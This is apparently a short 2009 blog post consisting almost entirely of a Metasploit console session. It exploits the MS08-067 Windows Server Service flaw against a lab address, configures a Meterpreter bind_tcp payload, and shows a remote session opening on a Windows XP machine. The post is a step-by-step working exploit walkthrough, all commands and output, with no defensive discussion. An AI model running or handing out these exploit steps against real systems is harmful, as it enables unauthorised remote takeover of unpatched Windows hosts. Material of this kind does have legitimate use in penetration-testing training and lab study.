Friday, September 11, 2009

MS08-067

5:57 AM  matthews  

msf > version
Framework: 3.2-testing.5773
Console : 3.2-testing.5773

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

msf exploit(ms08_067_netapi) > info windows/smb/ms08_067_netapi

Name: Microsoft Server Service Relative Path Stack Corruption
Version: 5803
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)

Provided by:
hdm

Available targets:
Id Name
-- ----
0 Windows XP SP2 English (DEP)
1 Windows XP SP3 English (DEP)
2 Windows 2003 SP0 English (NO DEP)
3 Windows 2003 SP2 English (NO DEP)

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload information:
Space: 400
Avoid: 7 characters

Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing DEP on some operating systems and service
packs. The correct target must be used to prevent the Server Service
(along with a dozen others in the same process) from crashing.
Windows XP targets seem to handle multiple successful exploitation
events, but 2003 targets will often crash or hang on subsequent
attempts. This is just the first version of this module, full
support for DEP bypass on 2003, along with other platforms, is still
in development.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx

msf exploit(ms08_067_netapi) > set RHOST 192.168.132.130
RHOST => 192.168.132.130

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Connecting to the target...
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] ...
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.132.1:51707 -> 192.168.132.130:4444)

meterpreter > sysinfo
Computer: Research-1
OS : Windows XP (Build 2600, Service Pack 2).

Posted in:
Twitter Delicious Facebook Digg Stumbleupon Favorites More